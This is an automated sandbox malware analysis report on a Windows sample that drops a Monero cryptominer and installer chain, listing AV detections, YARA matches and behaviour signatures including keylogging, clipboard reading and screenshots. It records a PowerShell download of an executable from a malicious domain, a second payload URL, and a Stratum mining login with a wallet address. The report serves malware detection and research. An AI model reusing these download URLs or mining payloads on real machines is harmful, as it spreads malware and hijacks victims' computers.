Joe Sandbox Cloud Pro Analysis Report

Loading ...

Analysis Report

Overview

General Information

Joe Sandbox Version:23.0.0
Analysis ID:638829
Start date:17.08.2018
Start time:12:40:15
Joe Sandbox Product:Cloud
Overall analysis duration:0h 10m 36s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:iaejSdZgD3 (renamed file extension from none to exe)
Cookbook file name:default.jbs
Analysis system description:Windows 7 x64 (Office 2003 SP3, Java 1.8.0_40, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 41, Firefox 36)
Number of analysed new started processes analysed:19
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies
  • HCA enabled
  • EGA enabled
  • HDC enabled
Analysis stop reason:Timeout
Detection:MAL
Classification:mal100.troj.evad.mine.winEXE@25/79@2/3
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 91% (good quality ratio 79.1%)
  • Quality average: 66.5%
  • Quality standard deviation: 34.2%
HCA Information:
  • Successful, ratio: 89%
  • Number of executed functions: 230
  • Number of non-executed functions: 88
Cookbook Comments:
  • Adjust boot time
  • Correcting counters for adjusted boot time
Warnings:
Show All
  • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size exceeded maximum capacity and may have missing disassembly code.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Skipping Hybrid Code Analysis (implementation is based on Java, .Net, VB or Delphi, or parses a document) for: powershell.exe, mscorsvw.exe

Detection

StrategyScoreRangeReportingDetection
Threshold1000 - 100Report FP / FNmalicious

Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification

Analysis Advice

Sample drops PE files which have not been started, submit dropped PE samples for a secondary analysis to Joe Sandbox
Sample has a GUI, but Joe Sandbox has not found any clickable buttons, likely more UI automation may extend behavior
Sample has functionality to log and monitor keystrokes, analyze it with the 'Simulates keyboard and window changes' cookbook
Sample is a service DLL but no service has been registered
Sample may offer command line options, please run it with the 'Execute binary with arguments' cookbook (it's possible that the command line switches require additional characters like: "-", "/", "--")
Sample monitors Window changes (e.g. starting applications), analyze the sample with the 'Simulates keyboard and window changes' cookbook
Sample tries to load a library which is not present or installed on the analysis machine, adding the library might reveal more behavior



Signature Overview

Click to jump to signature section


AV Detection:

barindex
Antivirus detection for dropped fileShow sources
Source: C:\Users\user~1\AppData\Local\Temp\RarSFX0\Silent.exeAvira: Label: TR/ATRAPS.Gen
Source: C:\ProgramData\qswGutmnEr\Silent.exeAvira: Label: TR/ATRAPS.Gen
Source: C:\ProgramData\playersclub\xmr-stak.exeAvira: Label: HEUR/AGEN.1001820
Source: C:\ProgramData\playersclub\player.exeAvira: Label: TR/BitCoinMiner.wmhoy
Antivirus detection for submitted fileShow sources
Source: iaejSdZgD3.exeAvira: Label: TR/AD.Bosoda.rdoap
Multi AV Scanner detection for submitted fileShow sources
Source: iaejSdZgD3.exevirustotal: Detection: 67%Perma Link
Antivirus detection for unpacked fileShow sources
Source: 9.1.Silent.exe.ed0000.0.unpackAvira: Label: TR/ATRAPS.Gen
Source: 10.0.notepad.exe.400000.3.unpackAvira: Label: PUA/CoinMiner.Gen
Source: 10.0.notepad.exe.400000.2.unpackAvira: Label: PUA/CoinMiner.Gen
Source: 9.0.Silent.exe.ed0000.0.unpackAvira: Label: TR/ATRAPS.Gen
Source: 10.0.notepad.exe.400000.0.unpackAvira: Label: PUA/CoinMiner.Gen
Source: 10.0.notepad.exe.400000.4.unpackAvira: Label: PUA/CoinMiner.Gen
Source: 10.0.notepad.exe.400000.1.unpackAvira: Label: PUA/CoinMiner.Gen
Yara signature matchShow sources
Source: 0000000B.00000001.14326263986.00000000004CE000.00000002.sdmp, type: MEMORYMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address
Source: 0000000B.00000000.14323320959.00000000004CE000.00000002.sdmp, type: MEMORYMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address
Source: 0000000B.00000000.14322375198.00000000004CE000.00000002.sdmp, type: MEMORYMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address
Source: 0000000B.00000000.14324102262.00000000004CE000.00000002.sdmp, type: MEMORYMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address
Source: 0000000B.00000000.14323677907.00000000004CE000.00000002.sdmp, type: MEMORYMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address
Source: 0000000B.00000000.14321426582.00000000004CE000.00000002.sdmp, type: MEMORYMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address
Source: 0000000B.00000000.14324578745.00000000004CE000.00000002.sdmp, type: MEMORYMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address
Source: 0000000B.00000002.14569189793.00000000004CE000.00000002.sdmp, type: MEMORYMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address
Source: 0000000B.00000000.14322706721.00000000004CE000.00000002.sdmp, type: MEMORYMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address
Source: 0000000B.00000000.14322028185.00000000004CE000.00000002.sdmp, type: MEMORYMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address
Source: 0000000A.00000000.14327903687.0000000000400000.00000040.sdmp, type: MEMORYMatched rule: XMRIG_Monero_Miner date = 2018-01-04, hash4 = 0972ea3a41655968f063c91a6dbd31788b20e64ff272b27961d12c681e40b2d2, hash3 = f3f2703a7959183b010d808521b531559650f6f347a5830e47f8e3831b10bad5, hash2 = 08b55f9b7dafc53dfc43f7f70cdd7048d231767745b76dc4474370fb323d7ae7, hash1 = 5c13a274adb9590249546495446bb6be5f2a08f9dcd2fc8a2049d9dc471135c0, author = Florian Roth, description = Detects Monero mining software, reference = https://github.com/xmrig/xmrig/releases
Source: dropped/player.txt, type: DROPPEDMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address
Source: C:\ProgramData\playersclub\player.txt, type: DROPPEDMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address
Source: C:\Users\user~1\AppData\Local\Temp\RarSFX0\pcdata\player.txt, type: DROPPEDMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address
Source: 10.0.notepad.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: XMRIG_Monero_Miner date = 2018-01-04, hash4 = 0972ea3a41655968f063c91a6dbd31788b20e64ff272b27961d12c681e40b2d2, hash3 = f3f2703a7959183b010d808521b531559650f6f347a5830e47f8e3831b10bad5, hash2 = 08b55f9b7dafc53dfc43f7f70cdd7048d231767745b76dc4474370fb323d7ae7, hash1 = 5c13a274adb9590249546495446bb6be5f2a08f9dcd2fc8a2049d9dc471135c0, author = Florian Roth, description = Detects Monero mining software, reference = https://github.com/xmrig/xmrig/releases

Bitcoin Miner:

barindex
Detected Stratum mining protocolShow sources
Source: global trafficTCP traffic: 192.168.1.20:49166 -> 104.207.130.172:10064 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"4brl51jcc9ngq71kwhnyodrffsdzy7m1huu7mru4numxahnfbejhktzv9hdal4gfunbxlpc3bemklgapbf5vwtanqrzvo2dv3ebjhc95xg","pass":"silent:x","agent":"xmrig/2.6.2 (windows nt 6.1; win64; x64) libuv/1.20.2 gcc/7.3.0","algo":["cn/1","cn/0","cn/xtl","cn"]}}.
Found strings related to Crypto-MiningShow sources
Source: notepad.exe, 0000000A.00000000.14327903687.0000000000400000.00000040.sdmpString found in binary or memory: stratum+tcp://
Source: Win.exe, 00000005.00000003.14297848634.0000000002CA0000.00000004.sdmpString found in binary or memory: _Z27cryptonight_extra_gpu_finaliyPjS_S__<
Source: notepad.exe, 0000000A.00000000.14327903687.0000000000400000.00000040.sdmpString found in binary or memory: stratum+tcp://
Source: notepad.exe, 0000000A.00000000.14327903687.0000000000400000.00000040.sdmpString found in binary or memory: Usage: xmrig [OPTIONS]

Spreading:

barindex
Creates COM task schedule object (often to register a task for autostart)Show sources
Source: C:\Windows\System32\sppsvc.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\sppsvc.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\TreatAs
Source: C:\Windows\System32\sppsvc.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\Progid
Source: C:\Windows\System32\sppsvc.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\Progid
Source: C:\Windows\System32\sppsvc.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
Source: C:\Windows\System32\sppsvc.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocHandler32
Source: C:\Windows\System32\sppsvc.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocHandler
Source: C:\Windows\System32\sppsvc.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\sppsvc.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\TreatAs
Enumerates the file systemShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick LaunchJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\Users\user\Desktop\iaejSdZgD3.exeCode function: 0_2_0000000140004D08 wcslen,wcslen,RtlAllocateHeap,wcscpy,wcscat,wcscat,FindFirstFileW,GetLastError,HeapFree,0_2_0000000140004D08
Source: C:\Users\user\Desktop\iaejSdZgD3.exeCode function: 0_2_000000014000B758 FindFirstFileW,0_2_000000014000B758
Source: C:\ProgramData\Win.exeCode function: 5_1_000000013FE7B1A8 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,5_1_000000013FE7B1A8
Source: C:\ProgramData\Win.exeCode function: 5_1_000000013FE9C630 FindFirstFileExA,5_1_000000013FE9C630
Source: C:\ProgramData\Win.exeCode function: 5_1_000000013FE8E830 SendDlgItemMessageW,GetDlgItem,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,FindClose,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,5_1_000000013FE8E830
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCode function: 6_2_00475350 FindFirstFileW,FindClose,GetFileAttributesW,6_2_00475350
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCode function: 6_2_004753E0 _wcschr,_wcschr,_wcschr,_wcsncpy,_wcschr,FindClose,FindFirstFileW,FindClose,_wcschr,FindFirstFileW,FindClose,6_2_004753E0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCode function: 6_2_00454140 GetFullPathNameW,GetFullPathNameW,GetFullPathNameW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,FindFirstFileW,GetLastError,__wsplitpath,GetLastError,GetTickCount,PeekMessageW,GetTickCount,MoveFileW,DeleteFileW,MoveFileW,GetLastError,CopyFileW,GetLastError,FindNextFileW,FindClose,6_2_00454140
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCode function: 6_2_00443150 CreateFileW,GetFileSizeEx,CloseHandle,FindFirstFileW,GetLastError,FindClose,__alldiv,6_2_00443150
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCode function: 6_2_00442290 _wcsncpy,_wcsrchr,_wcsrchr,FindFirstFileW,GetTickCount,GetTickCount,GetTickCount,PeekMessageW,GetTickCount,GetTickCount,SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,__itow,6_2_00442290
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCode function: 6_2_00453350 _wcschr,_wcschr,GetFileAttributesW,FindFirstFileW,FindClose,CoInitialize,CoCreateInstance,CoUninitialize,6_2_00453350
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCode function: 6_2_004424A7 GetTickCount,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,__itow,6_2_004424A7
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCode function: 6_2_004424A9 GetTickCount,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,__itow,6_2_004424A9
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCode function: 6_2_004548C0 _wcschr,_wcschr,GetFileAttributesW,FindFirstFileW,FindClose,6_2_004548C0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCode function: 6_2_004429C0 FindFirstFileW,GetLastError,FindClose,FileTimeToLocalFileTime,6_2_004429C0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCode function: 6_2_00442B40 _wcsncpy,SystemTimeToFileTime,GetLastError,LocalFileTimeToFileTime,GetSystemTimeAsFileTime,_wcsrchr,_wcsrchr,FindFirstFileW,GetLastError,SetFileTime,GetTickCount,GetTickCount,PeekMessageW,GetTickCount,CreateFileW,GetLastError,SetFileTime,GetLastError,CloseHandle,GetTickCount,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,6_2_00442B40
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCode function: 6_2_0042BC70 _wcsncpy,_wcsrchr,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,GetTickCount,FindNextFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,FindClose,6_2_0042BC70
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCode function: 6_2_00470CF0 FindFirstFileW,FindClose,GetFileAttributesW,CreateFileW,WriteFile,WriteFile,WriteFile,CloseHandle,6_2_00470CF0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCode function: 6_2_00441D00 SetLastError,DeleteFileW,GetLastError,FindFirstFileW,GetLastError,_wcsrchr,GetLastError,GetTickCount,GetTickCount,PeekMessageW,GetTickCount,DeleteFileW,GetLastError,FindNextFileW,FindClose,6_2_00441D00
Source: C:\ProgramData\playersclub\LaunchServ.exeCode function: 12_2_00401A50 FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,12_2_00401A50

Networking:

barindex
Detected TCP or UDP traffic on non-standard portsShow sources
Source: global trafficTCP traffic: 192.168.1.20:49166 -> 104.207.130.172:10064
Downloads executable code via HTTPShow sources
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 17 Aug 2018 10:41:11 GMTServer: ApacheLast-Modified: Tue, 17 Jul 2018 13:17:56 GMTETag: "83d672-57131c632e9e7"Content-Length: 8640114Content-Type: application/x-msdos-programX-Varnish: 356257129Age: 0Via: 1.1 varnish (Varnish/6.0)Accept-Ranges: bytesConnection: keep-aliveData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 09 af 3d 7e 4d ce 53 2d 4d ce 53 2d 4d ce 53 2d f9 52 a2 2d 45 ce 53 2d f9 52 a0 2d c7 ce 53 2d f9 52 a1 2d 40 ce 53 2d 76 90 50 2c 45 ce 53 2d 76 90 57 2c 5e ce 53 2d 76 90 56 2c 66 ce 53 2d 44 b6 d0 2d 44 ce 53 2d 44 b6 d4 2d 4c ce 53 2d 44 b6 c0 2d 4e ce 53 2d 4d ce 52 2d b2 ce 53 2d da 90 56 2c 7d ce 53
HTTP GET or POST without a user agentShow sources
Source: global trafficHTTP traffic detected: GET /Start_me.exe HTTP/1.1Host: xmrminingpro.comConnection: Keep-Alive
Internet Provider seen in connection with other malwareShow sources
Source: Joe Sandbox ViewASN Name: AS-CHOOPA-ChoopaLLCUS AS-CHOOPA-ChoopaLLCUS
Source: Joe Sandbox ViewASN Name: ONECOMDK ONECOMDK
Contains functionality to download additional files from the internetShow sources
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Silent.exeCode function: 9_1_00ED45C0 GetTickCount,InternetCrackUrlA,InternetOpenA,InternetConnectA,InternetCloseHandle,HttpOpenRequestA,InternetCloseHandle,InternetQueryOptionA,InternetSetOptionA,HttpSendRequestA,InternetReadFile,GetLastError,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,9_1_00ED45C0
Downloads files from webservers via HTTPShow sources
Source: global trafficHTTP traffic detected: GET /Start_me.exe HTTP/1.1Host: xmrminingpro.comConnection: Keep-Alive
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: xmrminingpro.com
Urls found in memory or binary dataShow sources
Source: powershell.exe, 00000004.00000002.14283693344.0000000002840000.00000004.sdmpString found in binary or memory: file://
Source: Silent.exe, Silent.exe, 00000009.00000000.14306328199.0000000000ED8000.00000002.sdmpString found in binary or memory: file:///
Source: installer.exe, 0000000B.00000003.14417872180.0000000000A82000.00000004.sdmpString found in binary or memory: file:///C:/ProgramData/playersclub/LaunchServ.exe
Source: installer.exe, 0000000B.00000003.14417872180.0000000000A82000.00000004.sdmpString found in binary or memory: file:///C:/ProgramData/playersclub/LaunchServ.exefb
Source: setup.exe, 00000006.00000002.14329550761.0000000000B48000.00000004.sdmpString found in binary or memory: file:///C:/Users/user/AppData/Local/Temp/RarSFX0/installer.exe
Source: powershell.exe, 00000004.00000002.14281932152.000000000016E000.00000004.sdmpString found in binary or memory: file:///C:/Windows/System32/WindowsPowerShell/v1.0/&
Source: powershell.exe, 00000004.00000002.14281932152.000000000016E000.00000004.sdmpString found in binary or memory: file:///C:/Windows/System32/WindowsPowerShell/v1.0//
Source: powershell.exe, 00000004.00000002.14285151440.000000000309C000.00000004.sdmpString found in binary or memory: file:///C:/Windows/assembly/GAC_MSIL/Microsoft.PowerShell.Commands.Diagnostics/1.0.0.0__31bf3856ad36
Source: powershell.exe, 00000004.00000002.14285151440.000000000309C000.00000004.sdmpString found in binary or memory: file:///C:/Windows/assembly/GAC_MSIL/Microsoft.PowerShell.Commands.Management/1.0.0.0__31bf3856ad364
Source: powershell.exe, 00000004.00000002.14285151440.000000000309C000.00000004.sdmpString found in binary or memory: file:///C:/Windows/assembly/GAC_MSIL/Microsoft.PowerShell.Commands.Utility/1.0.0.0__31bf3856ad364e35
Source: powershell.exe, 00000004.00000002.14285151440.000000000309C000.00000004.sdmpString found in binary or memory: file:///C:/Windows/assembly/GAC_MSIL/Microsoft.PowerShell.ConsoleHost/1.0.0.0__31bf3856ad364e35/Micr
Source: powershell.exe, 00000004.00000002.14285151440.000000000309C000.00000004.sdmpString found in binary or memory: file:///C:/Windows/assembly/GAC_MSIL/Microsoft.PowerShell.Security/1.0.0.0__31bf3856ad364e35/Microso
Source: powershell.exe, 00000004.00000002.14285151440.000000000309C000.00000004.sdmpString found in binary or memory: file:///C:/Windows/assembly/GAC_MSIL/Microsoft.WSMan.Management/1.0.0.0__31bf3856ad364e35/Microsoft.
Source: powershell.exe, 00000004.00000002.14285151440.000000000309C000.00000004.sdmpString found in binary or memory: file:///C:/Windows/assembly/GAC_MSIL/System.Management.Automation/1.0.0.0__31bf3856ad364e35/System.M
Source: iaejSdZgD3.exe, 00000000.00000002.14290926038.00000000003A4000.00000004.sdmpString found in binary or memory: file:///C:/Windows/system32/cmd.exe
Source: powershell.exe, 00000004.00000002.14283693344.0000000002840000.00000004.sdmpString found in binary or memory: file:///P
Source: powershell.exe, 00000004.00000002.14283747289.000000000289E000.00000004.sdmpString found in binary or memory: http://
Source: setup.exe, 00000006.00000003.14316647836.0000000003A01000.00000004.sdmpString found in binary or memory: http://%s/h
Source: setup.exe, 00000006.00000003.14316647836.0000000003A01000.00000004.sdmpString found in binary or memory: http://%s/hLocationHTTP
Source: setup.exe, setup.exe, 00000006.00000001.14306303332.000000000049F000.00000002.sdmp, installer.exe, 0000000B.00000000.14321313278.000000000049F000.00000002.sdmp, systemSpawn.exe, 0000000F.00000000.14333161648.000000000049F000.00000002.sdmp, systemSpawn.exe.6.drString found in binary or memory: http://ahkscript.org
Source: setup.exe, 00000006.00000001.14306303332.000000000049F000.00000002.sdmp, installer.exe, 0000000B.00000000.14321313278.000000000049F000.00000002.sdmp, systemSpawn.exe, 0000000F.00000000.14333161648.000000000049F000.00000002.sdmp, systemSpawn.exe.6.drString found in binary or memory: http://ahkscript.orgCould
Source: powershell.exe, 00000004.00000003.14259219372.000000000017A000.00000004.sdmpString found in binary or memory: http://java.co
Source: powershell.exe, 00000004.00000003.14259219372.000000000017A000.00000004.sdmpString found in binary or memory: http://java.com/
Source: powershell.exe, 00000004.00000003.14259219372.000000000017A000.00000004.sdmpString found in binary or memory: http://java.com/B
Source: powershell.exe, 00000004.00000003.14259219372.000000000017A000.00000004.sdmpString found in binary or memory: http://java.com/help
Source: powershell.exe, 00000004.00000003.14259219372.000000000017A000.00000004.sdmpString found in binary or memory: http://java.com/helphttp://java.com/helpB
Source: powershell.exe, 00000004.00000003.14259219372.000000000017A000.00000004.sdmpString found in binary or memory: http://java.com/http://java.com/B
Source: powershell.exe, 00000004.00000003.14259219372.000000000017A000.00000004.sdmpString found in binary or memory: http://javl
Source: systemSpawn.exe, 0000000F.00000000.14334773706.00000000004CE000.00000002.sdmp, systemSpawn.exe.6.drString found in binary or memory: http://multicryptominer.com/player.exe
Source: powershell.exe, 00000004.00000002.14283747289.000000000289E000.00000004.sdmpString found in binary or memory: http://schemas.dmtf.org/wbem/wsman/1/cimbinding/associationFilter
Source: powershell.exe, 00000004.00000002.14285151440.000000000309C000.00000004.sdmpString found in binary or memory: http://schemas.dmtf.org/wbem/wsman/1/cimbinding/associationFilterP
Source: powershell.exe, 00000004.00000002.14285151440.000000000309C000.00000004.sdmpString found in binary or memory: http://schemas.dmtf.org/wbem/wsman/1/wsman/SelectorFilter
Source: powershell.exe, 00000004.00000002.14283747289.000000000289E000.00000004.sdmpString found in binary or memory: http://schemas.dmtf.org/wbem/wsman/identity/1/wsmanidentity.xsd#IdentifyResponse
Source: pthreadVC2.dll.6.drString found in binary or memory: http://sourceware.org/pthreads-win32/D
Source: Win.exe, 00000005.00000003.14297848634.0000000002CA0000.00000004.sdmpString found in binary or memory: http://www.gnu.org/licenses/
Source: setup.exe, 00000006.00000003.14306899705.0000000002560000.00000004.sdmpString found in binary or memory: http://www.openssl.org/V
Source: setup.exe, 00000006.00000003.14306899705.0000000002560000.00000004.sdmpString found in binary or memory: http://www.openssl.org/support/faq.html
Source: setup.exe, 00000006.00000003.14306899705.0000000002560000.00000004.sdmpString found in binary or memory: http://www.openssl.org/support/faq.html.
Source: Win.exe, 00000005.00000003.14297848634.0000000002CA0000.00000004.sdmp, setup.exe, 00000006.00000003.14316745476.0000000000B7E000.00000004.sdmpString found in binary or memory: http://www.zlib.net/D
Source: powershell.exe, 00000004.00000002.14283747289.000000000289E000.00000004.sdmpString found in binary or memory: http://xmrmining
Source: powershell.exe, 00000004.00000002.14283747289.000000000289E000.00000004.sdmpString found in binary or memory: http://xmrminingpro.com
Source: powershell.exe, 00000004.00000002.14283747289.000000000289E000.00000004.sdmpString found in binary or memory: http://xmrminingpro.com/Start_me
Source: powershell.exe, 00000004.00000002.14281907269.0000000000130000.00000004.sdmp, powershell.exe, 00000004.00000002.14283747289.000000000289E000.00000004.sdmpString found in binary or memory: http://xmrminingpro.com/Start_me.exe
Source: powershell.exe, 00000004.00000002.14283747289.000000000289E000.00000004.sdmpString found in binary or memory: http://xmrminingpro.com/Start_me.exePE
Source: powershell.exe, 00000004.00000002.14284302075.0000000002C86000.00000004.sdmpString found in binary or memory: http://xmrminingpro.comH
Source: notepad.exe, 0000000A.00000000.14327903687.0000000000400000.00000040.sdmpString found in binary or memory: https://H
Source: notepad.exe, 0000000A.00000000.14327903687.0000000000400000.00000040.sdmpString found in binary or memory: https://L
Source: Win.exe, 00000005.00000003.14297848634.0000000002CA0000.00000004.sdmpString found in binary or memory: https://www.khronos.org/registry/OpenCL/extensions/amd/cl_amd_media_ops.txt
Source: Win.exe, 00000005.00000003.14297848634.0000000002CA0000.00000004.sdmpString found in binary or memory: https://www.khronos.org/registry/OpenCL/extensions/amd/cl_amd_media_ops2.txt

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Contains functionality for read data from the clipboardShow sources
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCode function: 6_2_004045E0 GetTickCount,IsClipboardFormatAvailable,GetTickCount,OpenClipboard,OpenClipboard,GetTickCount,OpenClipboard,6_2_004045E0
Contains functionality to read the clipboard dataShow sources
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCode function: 6_2_004044E0 GetClipboardFormatNameW,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,GetClipboardData,6_2_004044E0
Contains functionality to record screenshotsShow sources
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCode function: 6_2_00438890 GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,ReleaseDC,SelectObject,DeleteDC,DeleteObject,GetPixel,ReleaseDC,6_2_00438890
Contains functionality to retrieve information about pressed keystrokesShow sources
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCode function: 6_2_0040F060 GetAsyncKeyState,GetTickCount,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,6_2_0040F060

System Summary:

barindex
Dropped file seen in connection with other malwareShow sources
Source: Joe Sandbox ViewDropped File: C:\ProgramData\playersclub\Process.exe 5AAF73EF89F0EFAB963ABB170BC9B7CD7D4D5BD7A691CD83137B4CC39CD120DE
Source: Joe Sandbox ViewDropped File: C:\ProgramData\playersclub\libcurl-4.dll 7719DDD67FF07BEB26BC31D1CF925F278E302E6163E02169FF7DCEFCB651E007
Source: Joe Sandbox ViewDropped File: C:\ProgramData\playersclub\libiconv-2.dll CF33FC7FDF9DE404736A23B6821FD596AA53492A51DD4D83958C0DE477947708
Source: Joe Sandbox ViewDropped File: C:\ProgramData\playersclub\libidn-11.dll 6E4D69C688B9F318BB497CD7A322DF2E5470529880420B783061FA87AA916570
Source: Joe Sandbox ViewDropped File: C:\ProgramData\playersclub\libintl-8.dll 34618F63FD89C387019F7C061846D318FA98B52C7D9025DE093D442F29D4E87B
Powershell connects to networkShow sources
